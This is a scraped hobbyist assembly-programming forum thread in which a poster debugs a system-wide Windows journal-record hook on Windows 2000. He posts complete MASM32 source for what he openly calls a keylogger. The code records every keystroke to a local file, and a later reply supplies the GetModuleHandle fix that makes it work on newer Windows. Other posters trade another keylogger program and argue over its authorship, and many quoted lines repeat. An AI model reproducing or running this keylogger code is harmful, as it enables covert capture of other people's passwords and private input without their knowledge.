i never had a problem like this before... i can't get
dumb win2k to execute hooks... SetWindowsHookEx
always returns 0... with win98 everything works ok.
btw i'm using a systemwide journal-hook that is not
inside a dll. any suggestions?
dumb win2k to execute hooks... SetWindowsHookEx
always returns 0... with win98 everything works ok.
btw i'm using a systemwide journal-hook that is not
inside a dll. any suggestions?
btw i'm using a systemwide journal-hook that is not
inside a dll
inside a dll
What do you mean by this? The callback function for the hook must reside in a stdcall dll.
no, a journal-hook must not reside in a dll.
APIREF:
A Win32 JournalRecordProc hook procedure does not need to live in a dynamic-link library. A Win32 JournalRecordProc hook procedure can live in the application itself.
APIREF:
A Win32 JournalRecordProc hook procedure does not need to live in a dynamic-link library. A Win32 JournalRecordProc hook procedure can live in the application itself.
SetWindowsHookEx always returns 0
Show us your code, i have used this function more than once and it works perfectly, i have also tested it in Win95.
ok... this is a very uncommon keylogger i think, i
use a dummy-edit-box instaed a windowproc...
just a test... but don't working in w2k...
thank you...
use a dummy-edit-box instaed a windowproc...
just a test... but don't working in w2k...
.486
.MODEL FLAT, STDCALL
OPTION CASEMAP: NONE
INCLUDE \MASM32\INCLUDE\WINDOWS.INC
INCLUDE \MASM32\INCLUDE\USER32.INC
INCLUDE \MASM32\INCLUDE\KERNEL32.INC
INCLUDELIB \MASM32\LIB\USER32.LIB
INCLUDELIB \MASM32\LIB\KERNEL32.LIB
HOOKPROC PROTO :DWORD,:DWORD,:DWORD
.DATA
CLASSNAME DB "EDIT", 0
STOPFLAG DB 1
FILENAME DB "TEST.TXT", 0
COUNT DB 0
.DATA?
HHANDLE DD ?
FILEHANDLE DD ?
BUFFER DW ?
__HWND DD ?
__MSG MSG < ? >
.CODE
START: INVOKE CreateWindowEx, NULL, ADDR CLASSNAME, NULL,
0, 0, 0, 0, 0, NULL, NULL, NULL, NULL
MOV __HWND, EAX
INVOKE _lcreat, ADDR FILENAME,0
MOV FILEHANDLE, EAX
INVOKE SetWindowsHookEx, WH_JOURNALRECORD,ADDR HOOKPROC,NULL,NULL
MOV HHANDLE, EAX
_START: INVOKE GetMessage,addr __MSG,NULL,0,0
INVOKE DispatchMessage,addr __MSG
JMP _START
HOOKPROC PROC _NCODE:DWORD, _WPARAM:DWORD, _LPARAM:DWORD
LOCAL _MSG: MSG
CMP _NCODE, HC_ACTION
JNZ _MOD_0
OR STOPFLAG, 0
JZ _EXIT
MOV EAX,_LPARAM
CMP DWORD PTR [ EAX ], WM_KEYDOWN
JNZ _EXIT
MOV _MSG.message,WM_KEYDOWN
PUSH [ EAX + 4 ]
POP _MSG.wParam
PUSH [ EAX + 8 ]
POP _MSG.lParam
PUSH __HWND
POP _MSG.hwnd
INVOKE TranslateMessage,addr _MSG
INVOKE SendMessage,__HWND,WM_GETTEXT,2,addr BUFFER
OR byte ptr [ BUFFER ], 0
JZ _ZERO
invoke _lwrite,FILEHANDLE,ADDR BUFFER,1
_ZERO: INVOKE SendMessage,__HWND,EM_SETSEL,0,-1
INVOKE SendMessage,__HWND,WM_CLEAR,0,0
JMP _EXIT
_MOD_0: CMP _NCODE, HC_SYSMODALOFF
JNZ _MOD_1
MOV STOPFLAG, 0
JMP _EXIT
_MOD_1: CMP _NCODE, HC_SYSMODALOFF
JNZ _NOPE
MOV STOPFLAG, 1
JMP _EXIT
_NOPE: OR _NCODE, 0
JNZ _EXIT
INVOKE CallNextHookEx, HHANDLE, _NCODE, _WPARAM, _LPARAM
RET
_EXIT: XOR EAX, EAX
RET
HOOKPROC ENDP
END START
thank you...
Download residentkeys from this thread. It uses hooks. Watch the password below!!
codelover... i downloaded your prog... it's a
keylogger... i can write one for myself (and i did...)
my question was not "how can i write a keylogger"
it was like "why the f**k do i have trouble with
journal-hooks in 2k" :)
btw... i overlooked your source... do ?ou really retrieve
keyboard-input via "GetWindowText" ??? i mean you're
using a journalrec hook to retrieve hardware keyb-input
and you're only checking for WM_KEYDOWN to get keyb
data via "GetWindowsText" ??? hm crazy ;) uhm and did
you try it under 2k??
oh maybe it's because i didn't asign the hinstance
api ref says:
Identifies the DLL containing the hook procedure pointed to by the hkprc parameter. The hMod parameter must be set to NULL if the dwThreadID parameter specifies a thread created by the current process and if the hook procedure is within the code associated with the current process.
An error may occur if the hMod parameter is NULL and the dwThreadId parameter is zero or specifies the identifier of a thread created by another process.
but according to this text my code should be right... or not?
damn! will try it out, thank you
keylogger... i can write one for myself (and i did...)
my question was not "how can i write a keylogger"
it was like "why the f**k do i have trouble with
journal-hooks in 2k" :)
btw... i overlooked your source... do ?ou really retrieve
keyboard-input via "GetWindowText" ??? i mean you're
using a journalrec hook to retrieve hardware keyb-input
and you're only checking for WM_KEYDOWN to get keyb
data via "GetWindowsText" ??? hm crazy ;) uhm and did
you try it under 2k??
oh maybe it's because i didn't asign the hinstance
api ref says:
Identifies the DLL containing the hook procedure pointed to by the hkprc parameter. The hMod parameter must be set to NULL if the dwThreadID parameter specifies a thread created by the current process and if the hook procedure is within the code associated with the current process.
An error may occur if the hMod parameter is NULL and the dwThreadId parameter is zero or specifies the identifier of a thread created by another process.
but according to this text my code should be right... or not?
damn! will try it out, thank you
Hey CodeLover,
are you sure that you aren't trying to sell someone else's code as yours? i had a look at "your" residentkeys program, it's nearly a complete copy of my program!
i mean, thanks for this:
"Thanks to Iczelion, nokturnal and nop-erator, both
gave me the source code from where i took the ideas to program this. "
....but it should be "...where i took the whole source to program this.", don't you think so, too?
-nop
are you sure that you aren't trying to sell someone else's code as yours? i had a look at "your" residentkeys program, it's nearly a complete copy of my program!
i mean, thanks for this:
"Thanks to Iczelion, nokturnal and nop-erator, both
gave me the source code from where i took the ideas to program this. "
....but it should be "...where i took the whole source to program this.", don't you think so, too?
-nop
NOP-erator,
My answer here
codelover... i downloaded your prog... it's a
keylogger... i can write one for myself (and i did...)
my question was not "how can i write a keylogger"
it was like "why the f**k do i have trouble with
journal-hooks in 2k"
mob, test the keylogger in Win2k, if it works it means that you could see why yours does not work. If the keylogger works, it means that there are not problems with the hooks, and you can study the code and see what it has that your code doesn't have. Is that so difficult? Which language am i writing in?
My answer here
codelover... i downloaded your prog... it's a
keylogger... i can write one for myself (and i did...)
my question was not "how can i write a keylogger"
it was like "why the f**k do i have trouble with
journal-hooks in 2k"
mob, test the keylogger in Win2k, if it works it means that you could see why yours does not work. If the keylogger works, it means that there are not problems with the hooks, and you can study the code and see what it has that your code doesn't have. Is that so difficult? Which language am i writing in?
ok CodeLover,
I replied there, too. you tested it on win2k and it does work? cool....hadn't any chance to test it there.
nop
I replied there, too. you tested it on win2k and it does work? cool....hadn't any chance to test it there.
nop
nop,
My reply there too.
No, nop, i didn't test it, that's why i told him to test it.
My reply there too.
No, nop, i didn't test it, that's why i told him to test it.
ok, found the time to kill this bug(?)
this dumb api-ref gets me pissed sometimes :( ...
INVOKE SetWindowsHookEx, WH_JOURNALRECORD,ADDR HOOKPROC,NULL,NULL
worked in win95/98 but not in 2k so
INVOKE GetModuleHandle,NULL
INVOKE SetWindowsHookEx, WH_JOURNALRECORD,ADDR HOOKPROC,eax,NULL
does the job in 2k, too...
this dumb api-ref gets me pissed sometimes :( ...